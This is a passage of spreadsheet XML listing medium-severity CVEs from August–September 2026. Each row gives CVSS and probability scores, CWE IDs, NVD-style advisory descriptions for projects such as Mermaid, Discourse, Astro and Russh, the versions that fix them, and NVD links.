      <c r="H5133" s="5" t="inlineStr"/>
      <c r="I5133" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5133" s="5" t="inlineStr"/>
      <c r="K5133" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L5133" s="5" t="inlineStr">
        <is>
          <t>Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.74.3 and 6.24.2, public frontend forms did not enforce the file upload restrictions that the Control Panel enforces, so an unauthenticated visitor could upload file types an administrator had intended to disallow through a form's assets or files field, and for assets fields, files could be stored on a public, web-accessible disk, though the application's global upload allowlist still blocked executable types such as .php and .html. This issue is fixed in versions 5.74.3 and 6.24.2.</t>
        </is>
      </c>
      <c r="M5133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71434</t>
        </is>
      </c>
    </row>
    <row r="5134">
      <c r="A5134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71436</t>
        </is>
      </c>
      <c r="C5134" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5134" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5134" s="5" t="inlineStr"/>
      <c r="F5134" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5134" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5134" s="5" t="inlineStr"/>
      <c r="I5134" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5134" s="5" t="inlineStr"/>
      <c r="K5134" s="5" t="inlineStr">
        <is>
          <t>CWE-1325, CWE-835</t>
        </is>
      </c>
      <c r="L5134" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. From version 10.6.0 until 10.9.8 and 11.16.1, Mermaid XY Charts are vulnerable to an infinite loop denial of service in the setXAxisRangeData function when configuring an X-Axis with invalid parameters. Because each loop iteration appends an element to an array, this generally causes a RangeError to appear after a few seconds, but it may instead cause the page or JavaScript process to crash from memory exhaustion, depending on the environment. This issue is fixed in versions 10.9.8 and 11.16.1.</t>
        </is>
      </c>
      <c r="M5134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71436</t>
        </is>
      </c>
    </row>
    <row r="5135">
      <c r="A5135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71439</t>
        </is>
      </c>
      <c r="C5135" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5135" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5135" s="5" t="inlineStr"/>
      <c r="F5135" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5135" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5135" s="5" t="inlineStr"/>
      <c r="I5135" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5135" s="5" t="inlineStr"/>
      <c r="K5135" s="5" t="inlineStr">
        <is>
          <t>CWE-1322, CWE-606</t>
        </is>
      </c>
      <c r="L5135" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. From version 11.6.0 until 11.16.1, Mermaid Radar Diagrams allow arbitrary large values for the ticks parameter, which can cause high CPU usage and freeze the rendering webpage or JavaScript process for long periods of time, potentially until the process is killed from memory exhaustion. This issue is fixed in version 11.16.1.</t>
        </is>
      </c>
      <c r="M5135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71439</t>
        </is>
      </c>
    </row>
    <row r="5136">
      <c r="A5136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71848</t>
        </is>
      </c>
      <c r="C5136" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5136" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5136" s="5" t="inlineStr"/>
      <c r="F5136" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5136" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5136" s="5" t="inlineStr"/>
      <c r="I5136" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5136" s="5" t="inlineStr"/>
      <c r="K5136" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L5136" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. From 4.12.0 to 4.12.33, the languageDetector middleware is vulnerable to algorithmic complexity denial of service when processing a crafted language tag containing a large number of hyphen separated subtags. To implement progressive language tag truncation, normalizeLanguage() repeatedly calls parts.slice(0, i).join('-') for every possible prefix, so the total amount of string processing grows quadratically with the number of subtags. Language values may come from a query parameter, cookie, Accept-Language header, or URL path, depending on the detector configuration, and the default detector order enables query string, cookie, and header detection, so applications using languageDetector() may expose this processing to unauthenticated requests. An attacker may repeatedly send requests containing long, hyphen separated language tags, causing excessive CPU consumption and preventing unrelated requests from being processed. This issue is fixed in version 4.12.34.</t>
        </is>
      </c>
      <c r="M5136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71848</t>
        </is>
      </c>
    </row>
    <row r="5137">
      <c r="A5137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72721</t>
        </is>
      </c>
      <c r="C5137" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5137" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5137" s="5" t="inlineStr"/>
      <c r="F5137" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5137" s="5" t="inlineStr"/>
      <c r="H5137" s="5" t="inlineStr"/>
      <c r="I5137" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5137" s="5" t="inlineStr"/>
      <c r="K5137" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L5137" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, Onebox::DomainChecker.is_blocked? compares hostnames and SiteSetting.blocked_onebox_domains entries case-sensitively, allowing an attacker to bypass configured Onebox domain restrictions by changing character casing in a redirect target hostname. This issue is fixed in versions 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M5137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72721</t>
        </is>
      </c>
    </row>
    <row r="5138">
      <c r="A5138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72723</t>
        </is>
      </c>
      <c r="C5138" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5138" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5138" s="5" t="inlineStr"/>
      <c r="F5138" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5138" s="5" t="inlineStr"/>
      <c r="H5138" s="5" t="inlineStr"/>
      <c r="I5138" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J5138" s="5" t="inlineStr"/>
      <c r="K5138" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5138" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, SiteSerializer.anonymous_default_navigation_menu_tags serializes tags from SiteSetting.default_navigation_menu_tags without applying DiscourseTagging.filter_visible for the anonymous viewer. An unauthenticated user can retrieve restricted tag names and descriptions through /site.json when those tags are limited by inaccessible categories, category tag groups, or tag-group permissions. This issue is fixed in versions 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M5138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72723</t>
        </is>
      </c>
    </row>
    <row r="5139">
      <c r="A5139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72834</t>
        </is>
      </c>
      <c r="C5139" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5139" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5139" s="5" t="inlineStr"/>
      <c r="F5139" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5139" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H5139" s="5" t="inlineStr"/>
      <c r="I5139" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J5139" s="5" t="inlineStr"/>
      <c r="K5139" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5139" s="5" t="inlineStr">
        <is>
          <t>filebrowser before 2.63.19 contains a permission bypass in the /api/resources endpoint. The checksum (?checksum=) branch of resourceGetHandler reads the entire file to compute a digest and returns it without performing a Perm.Download check (unlike the sibling raw, preview, and subtitle paths). As a result, an authenticated user provisioned with Perm.Download=false can obtain a content-hash oracle for any same-scope file (md5/sha1/sha256/sha512), enabling confirmation of known/guessed content, change detection, and offline brute-force of low-entropy files. This is an incomplete fix of CVE-2026-35606; it bypasses only the Download permission and does not defeat scope/path authorization.</t>
        </is>
      </c>
      <c r="M5139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72834</t>
        </is>
      </c>
    </row>
    <row r="5140">
      <c r="A5140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73082</t>
        </is>
      </c>
      <c r="C5140" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5140" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5140" s="5" t="inlineStr"/>
      <c r="F5140" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5140" s="5" t="inlineStr"/>
      <c r="H5140" s="5" t="inlineStr"/>
      <c r="I5140" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5140" s="5" t="inlineStr"/>
      <c r="K5140" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-918</t>
        </is>
      </c>
      <c r="L5140" s="5" t="inlineStr">
        <is>
          <t>Activepieces is an open source AI workflow automation platform. Prior to 0.82.0, the POST /api/v1/projects/:projectId/mcp-server/validate-agent-mcp-tool endpoint makes an outbound HTTP or SSE request to a user-supplied serverUrl without URL validation or SSRF protection. An authenticated user can cause the Activepieces server to connect to internal services, cloud metadata endpoints, or arbitrary external hosts and probe network reachability from the Activepieces host. This issue is fixed in version 0.82.0.</t>
        </is>
      </c>
      <c r="M5140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73082</t>
        </is>
      </c>
    </row>
    <row r="5141">
      <c r="A5141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73085</t>
        </is>
      </c>
      <c r="C5141" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5141" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5141" s="5" t="inlineStr"/>
      <c r="F5141" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5141" s="5" t="inlineStr"/>
      <c r="H5141" s="5" t="inlineStr"/>
      <c r="I5141" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5141" s="5" t="inlineStr"/>
      <c r="K5141" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L5141" s="5" t="inlineStr">
        <is>
          <t>Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.36.0, the jwtAuthCheck function in server/auth/TokenManager.js treats JWTs with the refresh token type as bearer access tokens on API and WebSocket resource endpoints such as /api/me instead of restricting them to /auth/refresh, allowing refresh tokens to authenticate as the associated users. This issue is fixed in version 2.36.0.</t>
        </is>
      </c>
      <c r="M5141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73085</t>
        </is>
      </c>
    </row>
    <row r="5142">
      <c r="A5142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73219</t>
        </is>
      </c>
      <c r="C5142" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5142" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5142" s="5" t="inlineStr"/>
      <c r="F5142" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5142" s="5" t="inlineStr"/>
      <c r="H5142" s="5" t="inlineStr"/>
      <c r="I5142" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5142" s="5" t="inlineStr"/>
      <c r="K5142" s="5" t="inlineStr">
        <is>
          <t>CWE-1288</t>
        </is>
      </c>
      <c r="L5142" s="5" t="inlineStr">
        <is>
          <t>CVAT is an open source interactive video and image annotation tool for computer vision. From 2.17.0 until 2.72.0, a user with write access to a CVAT job can submit a batch automatic annotation request to RequestViewSet.create with inconsistent task and job IDs, and because the task ID determines the single active request slot, block automatic annotation for another task whose ID is known. This issue is fixed in version 2.72.0.</t>
        </is>
      </c>
      <c r="M5142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73219</t>
        </is>
      </c>
    </row>
    <row r="5143">
      <c r="A5143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73221</t>
        </is>
      </c>
      <c r="C5143" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5143" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5143" s="5" t="inlineStr"/>
      <c r="F5143" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5143" s="5" t="inlineStr"/>
      <c r="H5143" s="5" t="inlineStr"/>
      <c r="I5143" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5143" s="5" t="inlineStr"/>
      <c r="K5143" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5143" s="5" t="inlineStr">
        <is>
          <t>CVAT is an open source interactive video and image annotation tool for computer vision. From 2.17.0 until 2.72.0, a user with the Worker role can use predictable task-based request IDs with the lambda request retrieve and destroy endpoints to view automatic annotation requests for tasks or jobs the user cannot access and cancel requests initiated by other users. This issue is fixed in version 2.72.0.</t>
        </is>
      </c>
      <c r="M5143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73221</t>
        </is>
      </c>
    </row>
    <row r="5144">
      <c r="A5144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73244</t>
        </is>
      </c>
      <c r="C5144" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5144" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5144" s="5" t="inlineStr"/>
      <c r="F5144" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5144" s="5" t="inlineStr">
        <is>
          <t>java, spring</t>
        </is>
      </c>
      <c r="H5144" s="5" t="inlineStr"/>
      <c r="I5144" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5144" s="5" t="inlineStr"/>
      <c r="K5144" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5144" s="5" t="inlineStr">
        <is>
          <t>kkFileView is a universal file online preview project based on Spring Boot. Prior to 5.0.1, the unauthenticated POST /listFiles endpoint in server/src/main/java/cn/keking/web/controller/FileController.java passes the user-controlled path parameter from FileController#getFiles to Files.newDirectoryStream without confinement to the demo directory, allowing directory enumeration outside the intended root. This issue is fixed in version 5.0.1.</t>
        </is>
      </c>
      <c r="M5144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73244</t>
        </is>
      </c>
    </row>
    <row r="5145">
      <c r="A5145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73290</t>
        </is>
      </c>
      <c r="C5145" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5145" s="5" t="inlineStr"/>
      <c r="F5145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5145" s="5" t="inlineStr"/>
      <c r="H5145" s="5" t="inlineStr"/>
      <c r="I5145" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5145" s="5" t="inlineStr"/>
      <c r="K5145" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5145" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.12, an anonymous ListObjectVersions request in rustfs/src/storage/access.rs that lacks a direct bucket-policy grant falls back to an s3:ListBucket check and returns before the policy_allowed path applies deny_anonymous_table_data_plane_if_needed and RestrictPublicBuckets, so a bucket that permits anonymous listing can continue exposing version listings after an operator enables the public-access control. The bypass affects GET /&lt;bucket&gt;?versions= and can disclose object version metadata even though equivalent GetObject requests are denied. This issue is fixed in version 1.0.0-beta.12.</t>
        </is>
      </c>
      <c r="M5145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73290</t>
        </is>
      </c>
    </row>
    <row r="5146">
      <c r="A5146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73306</t>
        </is>
      </c>
      <c r="C5146" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5146" s="5" t="inlineStr"/>
      <c r="F5146" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5146" s="5" t="inlineStr"/>
      <c r="H5146" s="5" t="inlineStr"/>
      <c r="I5146" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5146" s="5" t="inlineStr"/>
      <c r="K5146" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L5146" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.25, POST /api/global/auth/:tenantId/login incremented the failure counter in packages/worker/src/api/controllers/global/auth.ts only for existing users, while packages/worker/src/middleware/emailLockout.ts returned X-Account-Locked and Retry-After only for locked identifiers. An unauthenticated attacker could compare the response after repeated failures to enumerate valid email addresses and temporarily lock valid accounts. This issue is fixed in version 3.39.25.</t>
        </is>
      </c>
      <c r="M5146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73306</t>
        </is>
      </c>
    </row>
    <row r="5147">
      <c r="A5147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73422</t>
        </is>
      </c>
      <c r="C5147" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5147" s="5" t="inlineStr"/>
      <c r="F5147" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5147" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5147" s="5" t="inlineStr"/>
      <c r="I5147" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5147" s="5" t="inlineStr"/>
      <c r="K5147" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5147" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. From 2.9.0 until 7.1.0, Astro's server-side View Transition CSS generator interpolates animation properties into an inline style element without escaping them for CSS and HTML contexts. An attacker-controlled View Transition animation value such as duration can terminate the generated style element and inject arbitrary HTML or JavaScript. The affected code is packages/astro/src/runtime/server/transition.ts; renderTransition passes sheet.toString() into markHTMLString(), while addAnimationProperty serializes duration through toTimeValue() and also handles easing, direction, delay, fillMode, and name. Exploitation requires an on-demand or server-rendered route to pass attacker-controlled data into a View Transition animation definition and can execute arbitrary JavaScript in the affected application's origin, allowing access to sensitive page data and authenticated actions available to the victim. This issue is fixed in version 7.1.0.</t>
        </is>
      </c>
      <c r="M5147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73422</t>
        </is>
      </c>
    </row>
    <row r="5148">
      <c r="A5148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73429</t>
        </is>
      </c>
      <c r="C5148" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5148" s="5" t="inlineStr"/>
      <c r="F5148" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5148" s="5" t="inlineStr"/>
      <c r="H5148" s="5" t="inlineStr"/>
      <c r="I5148" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5148" s="5" t="inlineStr"/>
      <c r="K5148" s="5" t="inlineStr">
        <is>
          <t>CWE-704, CWE-754</t>
        </is>
      </c>
      <c r="L5148" s="5" t="inlineStr">
        <is>
          <t>Russh is a Rust SSH client &amp; server library. Prior to 0.62.4, a malicious SSH server can crash a russh client session with a malformed KEX_ECDH_REPLY containing a server ephemeral value that is not 32 bytes long. The client-side Curve25519Kex::compute_shared_secret function in russh/src/kex/curve25519.rs passes the decoded exchange.server_ephemeral value to clone_from_slice without validating its length, causing a deterministic panic before the server host key is verified. The panic terminates the spawned client session task and surfaces as a JoinError, while the embedding process normally remains running. This issue is fixed in version 0.62.4.</t>
        </is>
      </c>
      <c r="M5148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73429</t>
        </is>
      </c>
    </row>
    <row r="5149">
      <c r="A5149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73430</t>
        </is>
      </c>
      <c r="C5149" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5149" s="5" t="inlineStr"/>
      <c r="F5149" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5149" s="5" t="inlineStr"/>
      <c r="H5149" s="5" t="inlineStr"/>
      <c r="I5149" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5149" s="5" t="inlineStr"/>
      <c r="K5149" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L5149" s="5" t="inlineStr">
        <is>
          <t>Russh is a Rust SSH client &amp; server library. Prior to 0.62.4, an unauthenticated SSH client can cause a denial of service by sending SSH_MSG_KEX_ECDH_INIT with a 32-byte all-zero Q_C value. Curve25519Kex::server_dh in russh/src/kex/curve25519.rs accepts the all-zero peer public value and computes an all-zero shared secret, after which compute_exchange_hash calls encode_mpint in russh/src/kex/mod.rs and indexes beyond the end of the input while skipping leading zero bytes. The resulting panic occurs before authentication and terminates the server key-exchange task. This issue is fixed in version 0.62.4.</t>
        </is>
      </c>
      <c r="M5149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73430</t>
        </is>
      </c>
    </row>
    <row r="5150">
      <c r="A5150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73474</t>
        </is>
      </c>
      <c r="C5150" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5150" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5150" s="5" t="inlineStr"/>
      <c r="F5150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5150" s="5" t="inlineStr"/>
      <c r="H5150" s="5" t="inlineStr">
        <is>
          <t>entity_share_websub_project:entity_share_websub</t>
        </is>
      </c>
      <c r="I5150" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5150" s="5" t="inlineStr"/>
      <c r="K5150" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5150" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) vulnerability in Drupal Entity Share Websub allows Server Side Request Forgery. This issue affects Entity Share Websub versions: from 0.0.0 to 1.1.2.</t>
        </is>
      </c>
      <c r="M5150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73474</t>
        </is>
      </c>
    </row>
    <row r="5151">
      <c r="A5151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73508</t>
        </is>
      </c>
      <c r="C5151" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5151" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5151" s="5" t="inlineStr"/>
      <c r="F5151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5151" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H5151" s="5" t="inlineStr"/>
      <c r="I5151" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5151" s="5" t="inlineStr"/>
      <c r="K5151" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="L5151" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.dns.AbstractDnsRecord, io.netty.handler.codec.dns.DefaultDnsRecordDecoder.decodeRecord(), and io.netty.handler.codec.dns.DnsCodecUtil.decompressDomainName() failed to release retained or newly allocated ByteBuf objects when IDN.toASCII() or encodeDomainName() rejected a malformed domain name, allowing unauthenticated remote DNS packets to leak direct memory incrementally until denial of service. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.</t>
        </is>
      </c>
      <c r="M5151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73508</t>
        </is>
      </c>
    </row>
    <row r="5152">
      <c r="A5152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73531</t>
        </is>
      </c>
      <c r="C5152" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5152" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5152" s="5" t="inlineStr"/>
      <c r="F5152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5152" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5152" s="5" t="inlineStr"/>
      <c r="I5152" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5152" s="5" t="inlineStr"/>
      <c r="K5152" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5152" s="5" t="inlineStr">
        <is>
